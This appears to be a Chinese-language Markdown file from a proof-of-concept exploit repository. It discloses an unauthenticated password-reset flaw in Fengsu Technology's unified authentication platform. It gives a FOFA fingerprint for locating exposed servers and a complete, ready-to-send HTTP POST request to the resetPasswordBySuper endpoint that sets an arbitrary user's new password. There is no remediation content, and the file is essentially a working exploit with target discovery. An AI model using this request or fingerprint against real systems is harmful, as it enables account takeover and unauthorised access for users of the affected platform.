admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/风速科技统一认证平台存在密码重置漏洞.md
wy876 33aeb58103 7.12更新漏洞
2024-07-12 09:22:31 +08:00

30 lines
955 B
Markdown
Raw Permalink Blame History

## 风速科技统一认证平台存在密码重置漏洞
河南省风速科技统一认证平台,存在未授权漏洞,攻击者可通过该接口重置任意密码。
## fofa
```yaml
body="/cas/themes/zbvc/js/jquery.min.js"
```
![image-20240711192731504](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111927560.png)
## poc
```yaml
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close
{"xgh":"test","newPass":"test666","email":""}
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111927185.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111928817.png)
Reference in New Issue View Git Blame Copy Permalink